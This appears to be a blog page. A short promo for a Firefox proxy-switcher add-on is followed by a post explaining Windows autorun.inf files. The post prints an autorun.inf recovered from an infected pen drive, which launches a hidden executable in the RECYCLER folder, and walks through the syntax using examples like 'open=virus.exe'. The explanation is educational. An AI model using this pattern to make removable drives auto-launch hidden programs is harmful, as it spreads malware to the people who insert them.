* Automatically loads proxy servers every 1-30 minutes from our VIP zone or from user specified URL.
* Automatically changes proxy server every 1-30 minutes, that in turn increases your privacy level since your requests will be sent though different proxy servers.
* Setup any proxy server from available proxy list with just a single click.
* Manually switch proxy server to random one from the available proxy list with single click
* Delete selected proxy server from the list if it is not working any more and switch to random proxy server from available proxy list.
* Enable or Disable proxy server usage in Firefox with single click.
* Manually load proxy servers from our VIP section or user defined URL.
* Display proxy country in available proxy list menu, so user could easily select necessary one for that particular moment.
* Add shortcuts to all commands for those users who prefer to do everything fast (with keyboard).
* The possibility to manage proxy list manually with help of keyboard.

Download and install from here:

https://addons.mozilla.org/en-us/firefox/addon/premium-proxy-switcher/

Hacking Autorun.inf virus attack|Is autorun.inf virus?

When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:

[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:

[Autorun]

save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=WHCorp.ico

Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.